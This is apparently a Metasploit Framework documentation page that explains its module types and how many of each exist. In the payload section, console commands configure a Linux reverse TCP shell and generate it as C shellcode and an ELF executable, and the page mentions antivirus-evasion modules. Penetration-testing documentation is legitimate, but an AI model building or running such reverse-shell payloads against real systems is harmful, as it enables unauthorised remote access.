Link Search Menu Expand Document

Metasploit modules

There are currently 5698 Metasploit modules:

Module types

Auxiliary modules (1278)

Auxiliary modules do not exploit a target, but can perform useful tasks such as:

  • Administration - Modify, operate, or manipulate something on target machine
  • Analyzing - Tools that perform analysis, mostly password cracking
  • Gathering - Gather, collect, or enumerate data from a single target
  • Denial of Service - Crash or slow a target machine or service
  • Scanning - Scan targets for known vulnerabilities
  • Server Support - Run Servers for common protocols such as SMB, FTP, etc

Encoder modules (49)

Encoders take the raw bytes of a payload and run some sort of encoding algorithm, like bitwise XOR. These modules are useful for encoding bad characters such as null bytes.

Evasion modules (9)

Evasion modules give Framework users the ability to generate evasive payloads that aim to evade AntiVirus, such as Windows Defender, without having to install external tools.

Exploit modules (2481)

Exploit modules are used to leverage vulnerabilities in a manner that allows the framework to execute arbitrary code. The arbitrary code that is executed is referred to as the payload.

Nop modules (13)

Nop modules, short for ‘No Operation’, generate a sequence of ‘No Operation’ instructions that perform no side-effects. NOPs are often used in conjunction with stack buffer overflows.

Payloads modules (1475)

In the context of Metasploit exploit modules, payload modules encapsulate the arbitrary code (shellcode) that is executed as the result of an exploit succeeding. This normally involves the creation of a Metasploit session, but may instead execute code such as adding user accounts, or executing a simple pingback command that verifies that code execution was successful against a vulnerable target.

Payload modules can also be used individually to generate standalone executables, or shellcode for use within exploits:

msf6 payload(linux/x86/shell_reverse_tcp) > back
msf6 > use payload/linux/x86/shell_reverse_tcp
msf6 payload(linux/x86/shell_reverse_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 payload(linux/x86/shell_reverse_tcp) > set lport 4444
lport => 4444

# Generate a payload for use within C
msf6 payload(linux/x86/shell_reverse_tcp) > generate -f c

# Generate an ELF file for execution on Linux environments
msf6 payload(linux/x86/shell_reverse_tcp) > generate -f elf -o linux_shell

Post modules (393)

These modules are useful after a machine has been compromised and a Metasploit session has been opened. They perform useful tasks such as gathering, collecting, or enumerating data from a session.